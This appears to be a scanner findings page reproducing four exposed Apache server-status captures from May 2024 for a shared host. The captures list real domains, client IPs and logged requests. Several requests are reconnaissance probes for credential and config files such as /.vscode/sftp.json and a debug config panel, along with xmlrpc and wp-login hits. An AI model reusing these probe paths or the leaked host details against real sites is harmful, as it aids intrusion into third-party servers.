      16.42158011520390.055.92201.60
      127.0.0.1http/1.1php.we3dv
      Found on 2024-05-25 15:19
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a8314030ad9592

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Friday, 24-May-2024 20:21:53 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 1
      Parent Server MPM Generation: 0
      Server uptime:  1 day 16 hours 17 minutes 3 seconds
      Server load: 0.37 0.43 0.41
      Total accesses: 251555 - Total Traffic: 35.0 GB - Total Duration: 258563616
      CPU Usage: u284.23 s42.02 cu851.58 cs173.55 - .932% CPU load
      1.73 requests/sec - 253.4 kB/second - 146.1 kB/request - 1027.86 ms/request
      8 requests currently being processed, 0 workers gracefully restarting, 242 idle workers
      _______________K_________________K______________________________
      ___________R____________________________________________K_______
      ______________W_________________________________________________
      __K__________K_______________________________K____________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-0235000/312/1415_
      25.851628113977550.013.54130.36
      40.77.167.230http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1632&l_n=1&page=1 HTTP
      
      0-0235000/175/1040_
      25.87151676310960.08.36188.11
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-0235000/160/1132_
      25.9979736915850.010.37104.64
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-0235000/226/1105_
      25.84176834274420.013.53103.32
      114.119.153.11http/1.13dvi.com:443GET /images/folio/thumbs/142169496975839.jpg HTTP/1.1
      
      0-0235000/176/1178_
      26.0311628302990.049.63209.86
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-0235000/209/1000_
      25.82200408388720.032.07156.15
      95.185.78.247http/1.1albayan.edu.sa:443GET /web/160.html2 HTTP/1.1
      
      0-0235000/228/1237_
      26.0165212454270.010.36162.01
      95.185.78.247http/1.1albayan.edu.sa:443GET /images/image1.jpg HTTP/1.1
      
      0-0235000/189/1111_
      25.978926719910.06.31161.24
      5.110.49.232http/1.1zed.sa:443GET /menu/wp-content/plugins/jet-menu/assets/public/lib/font-aw
      
      0-0235000/226/1566_
      25.871401216864500.022.21183.95
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-0235000/201/1144_
      25.9011228359410.056.49207.77
      5.163.44.158http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-0235000/249/1004_
      25.9110962211225400.06.95131.04
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-0235000/228/1364_
      25.86153112791460.08.01134.96
      5.163.44.158http/1.1albayan.edu.sa:443GET /e_sch/css/images/arrow-next.png HTTP/1.1
      
      0-0235000/178/1095_
      25.76609213909420.07.70241.84
      167.248.133.184http/1.1
      
      0-0235000/274/1243_
      25.765813820630.09.04140.28
      167.248.133.184http/1.1
      
      0-0235000/198/1208_
      25.8319438267230.05.25102.40
      95.185.78.247http/1.1albayan.edu.sa:443GET /imgweb/5/icon%20downlode.jpg HTTP/1.1
      
      0-0235002/213/1050K
      26.040159756467.579.64230.22
      172.69.87.80http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-0235000/171/1066_
      25.8912215552690.05.98172.30
      188.53.52.185http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-0235000/236/1226_
      25.83187977450570.054.54236.24
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-0235000/268/1389_
      25.9690958616250.010.09172.25
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-0235000/243/1173_
      25.9970588963000.017.29125.07
      54.75.126.65http/1.1albayan.edu.sa:443GET /imgweb/file44/71%20%D8%AA%D8%A7%D8%A8%D8%B9%20%D8%AF%D9%84
      
      0-0235000/179/1144_
      25.921001007704600.09.0299.78
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-0235000/171/1139_
      26.0332633836270.034.06193.20
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-0235000/152/1115_
      26.032203361700.09.82147.70
      54.36.149.29http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=5&q=609&t=54.36.150.114&c=5 HTTP
      
      0-0235000/220/1097_
      26.0243917349490.04.89158.52
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-0235000/211/1276_
      25.81211706155100.037.05186.70
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-0235320/172/1016_
      25.681836421611230.073.78230.57
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-0235320/187/1155_
      25.80499810200430.062.52238.23
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-0235320/182/1078_
      25.72131715568640.09.83181.57
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-0235320/240/1167_
      25.7585639565650.023.50163.34
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-0235320/228/1096_
      25.8126763690220.06.17156.42
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-0235320/230/1004_
      25.73113676928280.018.76148.80
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-0235320/146/1000_
      25.6419715595110.09.76134.59
      95.185.78.247http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-0235320/176/1114_
      25.8114645658310.08.0483.91
      
      Found on 2024-05-24 17:21
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831401169a6f5

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Friday, 24-May-2024 07:07:39 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 1
      Parent Server MPM Generation: 0
      Server uptime:  1 day 3 hours 2 minutes 49 seconds
      Server load: 0.22 0.31 0.34
      Total accesses: 165575 - Total Traffic: 25.4 GB - Total Duration: 142587724
      CPU Usage: u120.97 s20.13 cu618.69 cs125.99 - .91% CPU load
      1.7 requests/sec - 273.5 kB/second - 160.8 kB/request - 861.167 ms/request
      23 requests currently being processed, 0 workers gracefully restarting, 202 idle workers
      _________K______________K__K__K___K_____________________________
      ___K______________K__K__________K__________________K_____KK____K
      _______________K_K_____________________W___K___KK_______________
      ______KK.........W..............................................
      ...................____________________K_K__....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-0243810/61/948_
      11.35294011063250.020.38108.27
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1355&t=192.99.37.133&c=5 HTTP
      
      0-0243810/99/660_
      11.3812602842710.014.88163.20
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1359&t=135.181.113.236&c=5 HT
      
      0-0243810/99/788_
      11.1653306141510.015.7684.53
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1191&t=78.46.63.108&c=5 HTTP/
      
      0-0243810/97/736_
      11.3033502487270.016.4581.17
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1354&t=192.99.37.133&c=5 HTTP
      
      0-0243810/101/717_
      11.3619105479540.09.44125.05
      54.36.148.195http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=984&t=54.36.148.115&c=5 HTTP/
      
      0-0243810/75/652_
      11.3624104779980.015.7496.57
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1356&t=65.108.46.72&c=5 HTTP/
      
      0-0243810/63/861_
      11.396105252980.044.1997.27
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1360&t=192.99.101.79&c=5 HTTP
      
      0-0243810/56/712_
      11.42715520400.020.53122.13
      51.39.113.21http/1.1albayan.edu.sa:443GET /apple-touch-icon.png HTTP/1.1
      
      0-0243810/115/1042_
      11.2834714341370.022.85151.91
      66.249.93.35http/1.1albayan.edu.sa:443GET /.well-known/traffic-advice HTTP/1.1
      
      0-0243811/123/769K
      11.42013552970.819.68142.11
      172.70.247.217http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-0243810/123/586_
      11.362792209332080.012.30109.47
      47.128.34.131http/1.1daris.live:80GET /bin/admin/social%20icon/youtube.png HTTP/1.1
      
      0-0243810/105/827_
      11.17455011307470.019.88116.91
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1220&t=78.46.63.108&c=5 HTTP/
      
      0-0243810/58/754_
      11.3716707991850.088.01195.05
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1358&t=192.99.101.79&c=5 HTTP
      
      0-0243810/58/798_
      11.411658722154860.09.38116.80
      216.244.66.198http/1.1albayan.edu.sa:443GET /imgweb/qb40/6/com11.pdf HTTP/1.1
      
      0-0243810/62/867_
      11.37181456244970.03.3690.19
      82.167.40.26http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      0-0243810/146/705_
      11.3910413472680.029.98138.75
      5.255.231.187http/1.1alnwisher.com:443GET /robots.txt HTTP/1.1
      
      0-0243810/112/776_
      11.3717403872280.015.56153.91
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1358&t=144.76.38.40&c=5 HTTP/
      
      0-0243810/117/795_
      11.3620905223960.033.51168.70
      45.158.14.229http/1.13dvi.com:80GET /wp-login.php HTTP/1.1
      
      0-0243810/169/959_
      11.0236517159070.020.33128.37
      198.71.229.93http/1.1
      
      0-0243810/212/753_
      11.3714705541980.018.7160.25
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1358&t=65.108.143.154&c=5 HTT
      
      0-0243810/105/761_
      11.1654504437270.05.5880.66
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1191&t=148.251.69.139&c=5 HTT
      
      0-0243810/121/816_
      11.3530241702370.026.37127.97
      195.191.219.132http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=2&q=1355&t=192.99.13.186&c=5 HTTP
      
      0-0243810/115/786_
      11.2338502358330.041.92130.92
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1352&t=192.99.13.186&c=5 HTTP
      
      0-0243810/50/661_
      11.17500592612540.043.00145.03
      217.133.221.210http/1.1trynidaa.com:443POST /wp-login.php HTTP/1.1
      
      0-0243811/110/847K
      11.42003059500.835.09111.30
      172.69.195.67http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      1-0244090/81/711_
      10.783505818911890.07.82149.17
      72.14.201.95http/1.1albayan.edu.sa:443GET /web/49.html2 HTTP/1.1
      
      1-0244090/153/789_
      11.0217103978730.035.36166.15
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      1-0244091/51/734K
      11.09004667930.824.22164.51
      172.70.243.167http/1.1nidaa.ws:80GET /login.action HTTP/1.1
      
      1-0244090/106/804_
      10.8723508582900.012.91136.14
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1356&t=92.220.10.100&c=5 HTTP
      
      1-0244090/55/746_
      10.77364861596470.05.0186.48
      198.71.229.93http/1.1trydaris.com:80POST /xmlrpc.php HTTP/1.1
      
      1-0244093/56/652K
      11.084362607410.610.53125.11
      51.39.113.21http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      1-0244090/72/738_
      10.75<
      Found on 2024-05-24 04:07
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831402ad29ba2

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 23-May-2024 05:33:00 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 1
      Parent Server MPM Generation: 0
      Server uptime:  1 hour 28 minutes 10 seconds
      Server load: 0.45 0.27 0.25
      Total accesses: 2604 - Total Traffic: 594.0 MB - Total Duration: 1085827
      CPU Usage: u17.61 s3.28 cu0 cs0 - .395% CPU load
      .492 requests/sec - 115.0 kB/second - 233.6 kB/request - 416.984 ms/request
      19 requests currently being processed, 0 workers gracefully restarting, 181 idle workers
      __K__________K___________________________K______K__________K____
      K_________WK____________K_K_________K___________KW___________K__
      _______________________K_____________K_________KC_____________K_
      ________........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      <SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-0295290/16/16_
      2.28389253793810.012.9412.94
      51.36.232.215http/1.1albayan.edu.sa:443GET /imgweb/file43/G9%20Basic%20Skills%20T3%20WB.pdf HTTP/1.1
      
      0-0295290/18/18_
      2.38229818340.00.630.63
      35.93.79.55http/1.1white-petals.com:443GET /robots.txt HTTP/1.1
      
      0-0295291/10/10K
      2.480215966.80.140.14
      172.70.251.146http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-0295290/13/13_
      2.30331127200.00.210.21
      195.191.219.130http/1.1jawad.com.sa:80GET / HTTP/1.1
      
      0-0295290/15/15_
      2.383022619010.00.260.26
      123.125.109.195http/1.1garndhabi.org:80GET / HTTP/1.1
      
      0-0295290/26/26_
      2.47129984790.04.294.29
      174.138.82.83http/1.1attendance.thenewjeddah.com:443GET / HTTP/1.1
      
      0-0295290/21/21_
      2.48835612840.00.850.85
      5.110.21.53http/1.1alezdhar.com:443GET /videos/Zed-450-1.mp4 HTTP/1.1
      
      0-0295290/11/11_
      2.4153220930.07.407.40
      182.40.104.255http/1.1abu-helal.com:80GET / HTTP/1.1
      
      0-0295290/14/14_
      2.3918965249550.016.0016.00
      5.110.21.53http/1.1alezdhar.com:443GET / HTTP/1.1
      
      0-0295290/17/17_
      2.401794429320.01.041.04
      205.185.116.34http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      0-0295290/12/12_
      2.099957040.00.590.59
      5.110.21.53http/1.1
      
      0-0295290/10/10_
      2.1212173760.00.100.10
      174.138.82.83http/1.1
      
      0-0295290/10/10_
      2.41159251134690.09.529.52
      5.110.21.53http/1.1alezdhar.com:443GET /images/company-bg.png HTTP/1.1
      
      0-0295291/12/12K
      2.49019540.80.290.29
      172.68.195.224http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-0295290/25/25_
      2.4632311660.01.241.24
      176.16.35.255http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-0295290/10/10_
      2.21476102522220.07.817.81
      66.249.64.14http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/03_70261_1.pdf HTTP/1.1
      
      0-0295290/16/16_
      2.2146513400.00.130.13
      172.105.16.34http/1.1hawsab.me:80GET /.vscode/sftp.json HTTP/1.1
      
      0-0295290/6/6_
      2.175227375150050.02.052.05
      31.167.231.170http/1.1albayan.edu.sa:443GET /imgweb/file44/71%20%D8%AA%D8%A7%D8%A8%D8%B9%20%D8%AF%D9%84
      
      0-0295290/9/9_
      2.21470381650.00.140.14
      139.162.210.205http/1.1trynidaa.com:80GET /s/8343e2130323e2130323e2833313/_/;/META-INF/maven/com.atla
      
      0-0295290/9/9_
      2.214727016470.01.951.95
      139.162.210.205http/1.1trynidaa.com:80GET /v2/_catalog HTTP/1.1
      
      0-0295290/11/11_
      1.97361162218090.09.699.69
      128.14.211.186http/1.1
      
      0-0295290/9/9_
      2.22465118110.00.190.19
      172.105.16.34http/1.1hawsab.me:80GET /.DS_Store HTTP/1.1
      
      0-0295290/33/33_
      2.38301311320.02.942.94
      178.86.107.84http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-0295290/17/17_
      2.234234399940.01.011.01
      142.154.82.60http/1.1albayan.edu.sa:443GET /web/251.html2 HTTP/1.1
      
      0-0295290/10/10_
      2.3034619240.00.110.11
      216.244.66.198http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/______________%20____________
      
      1-0295300/9/9_
      2.473792673492740.06.026.02
      216.244.66.198http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/fbssb06.pdf HTTP/1.1
      
      1-0295300/15/15_
      2.53338297692790.03.643.64
      5.110.21.53http/1.1alezdhar.com:443GET /videos/Zed-450-1.mp4 HTTP/1.1
      
      1-0295300/16/16_
      2.572900272060.021.6121.61
      54.36.148.208http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=994&t=54.36.150.105&c=5 HTTP/
      
      1-0295300/15/15_
      2.651796126560.01.731.73
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      1-0295300/23/23_
      2.5822143854060.01.381.38
      66.249.79.204http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%B4%D9%87%D8%A7%D8%AF%D8%A7%D8%AA%20%D8%AA%
      
      1-0295300/11/11_
      2.65159415490.00.180.18
      5.110.21.53http/1.1alezdhar.com:443GET /images/company-4.png HTTP/1.1
      
      1-0295300/22/22_
      2.533334222890.00.920.92
      195.191.219.130http/1.1jawad.com.sa:443GET / HTTP/1.1
      
      1-0295300/25/25_
      2.5730312114690.01.091.09
      178.86.107.84http/1.1albayan.edu.sa:443GET /images/slider/04.jpg HTTP/1.1
      
      1-0295300/12/12_
      2.1618912530291190.054.1454.14
      5.110.21.53http/1.1
      
      1-0295300/18/18_
      2.72455010.00.760.76
      5.110.21.53http/1.1
      Found on 2024-05-23 02:33
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a8314056976de4

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: May 15 2024 04:00:33
      
      Current Time: Thursday, 23-May-2024 03:04:31 +03
      Restart Time: Friday, 17-May-2024 13:23:21 +03
      Parent Server Config. Generation: 13
      Parent Server MPM Generation: 12
      Server uptime:  5 days 13 hours 41 minutes 9 seconds
      Server load: 0.45 0.32 0.32
      Total accesses: 832344 - Total Traffic: 136.4 GB - Total Duration: 1618825315
      CPU Usage: u278.25 s17.57 cu3407.54 cs852.19 - .947% CPU load
      1.73 requests/sec - 297.2 kB/second - 171.8 kB/request - 1944.9 ms/request
      11 requests currently being processed, 0 workers gracefully restarting, 239 idle workers
      _____________________K_______K________W_________________________
      ______R_________K______________________K___W____________________
      _________________________W_____K________________________________
      ________.........................__________W____________________
      _______________R___.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-12142300/34/4445_
      4.66428883270020.00.92527.46
      65.154.226.168http/1.1proxy-subdomains-vhost.localhosGET / HTTP/1.1
      
      0-12142300/28/4076_
      4.66390278888020.04.70890.85
      37.104.146.28http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-12142300/33/3787_
      4.65560261328670.01.33668.34
      138.201.201.48http/1.1zed.sa:443POST /wp-cron.php?doing_wp_cron=1716422110.29387402534484863281
      
      0-12142300/21/4391_
      4.749065245180.01.77594.44
      5.164.29.116http/1.1abu-helal.com:443GET /favicon.ico HTTP/1.1
      
      0-12142300/27/3942_
      4.6727121126098610.00.62692.66
      188.114.102.235http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-12142300/25/3873_
      4.65606081855840.03.07711.80
      54.36.148.6http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=4&q=1078&t=54.36.149.86&c=5 HTTP/
      
      0-12142300/47/4449_
      4.66362076297900.00.78726.99
      109.205.46.4http/1.1proxy-subdomains-vhost.localhosGET /wp-login.php HTTP/1.1
      
      0-12142300/33/4075_
      4.736816177041950.01.89603.84
      34.73.202.232http/1.1wahjcm.com:443GET /schedule?tab=2 HTTP/1.0
      
      0-12142300/54/4320_
      4.65473069084450.04.09544.96
      43.134.44.82http/1.13dvi.com:80GET / HTTP/1.1
      
      0-12142300/87/4258_
      4.62778285526820.01.99664.30
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1716421892.50480890274047851562
      
      0-12142300/40/3979_
      4.6273114664736690.01.89467.38
      216.244.66.194http/1.1sulaimaniya.edu.sa:80GET /robots.txt HTTP/1.1
      
      0-12142300/36/3897_
      4.65628366598110.01.33663.18
      139.162.210.205http/1.1hawsab.me:443GET / HTTP/1.1
      
      0-12142300/43/4437_
      4.71144065318080.01.38740.77
      40.77.167.41http/1.1albayan.edu.sa:80GET /imgweb/bank/6/olo6-2.pdf HTTP/1.1
      
      0-12142300/29/4394_
      4.711671027778666020.09.09547.53
      216.244.66.198http/1.1albayan.edu.sa:443GET /imgweb/taswer.mp4 HTTP/1.1
      
      0-12142300/36/4076_
      4.68209069171440.00.41683.29
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-12142300/30/3717_
      4.6466425867500990.01.86547.74
      2.90.14.41http/1.1albayan.edu.sa:443GET /e_sch/images/Background.jpg HTTP/1.1
      
      0-12142300/26/4190_
      4.6550848112833990.01.29677.32
      65.154.226.169http/1.1proxy-subdomains-vhost.localhosGET / HTTP/1.1
      
      0-12142300/31/3828_
      4.41628071533540.02.39491.44
      139.162.210.205http/1.1
      
      0-12142300/29/3923_
      4.627991100356700.03.28675.17
      66.249.64.46http/1.1alnwisher.com:80GET /FeaturedProperties/BROCHURE.pdf HTTP/1.1
      
      0-12142300/41/4329_
      4.65520164218350.01.22655.90
      167.248.133.36http/1.13dvi.com:443GET / HTTP/1.1
      
      0-12142300/131/4332_
      4.378051074560902430.01.75917.36
      128.90.61.61http/1.1
      
      0-12142301/23/4025K
      4.742170229400.80.64604.06
      172.71.134.61http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-12142300/22/3908_
      4.6287313777969550.01.41769.19
      85.208.96.209http/1.1sulaimaniya.edu.sa:443GET /robots.txt HTTP/1.1
      
      0-12142300/27/3931_
      4.72803476190610.03.65642.05
      52.167.144.238http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1566&l_n=1&page=1 HTTP
      
      0-12142300/26/4400_
      4.65627176041820.01.09827.59
      139.162.210.205http/1.1hawsab.me:443GET /_all_dbs HTTP/1.1
      
      1-12142580/75/3830_
      4.907393104500870.00.96649.15
      43.153.216.189http/1.1akgsa.com:443GET / HTTP/1.1
      
      1-12142580/29/3972_
      4.99176171889660.01.37603.79
      5.164.29.116http/1.1abu-helal.com:443GET / HTTP/1.1
      
      1-12142580/57/3346_
      4.97396077580530.09.33552.54
      54.36.148.179http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=3&q=452&t=54.36.150.131&c=5 HTTP
      
      1-12142580/26/3671_
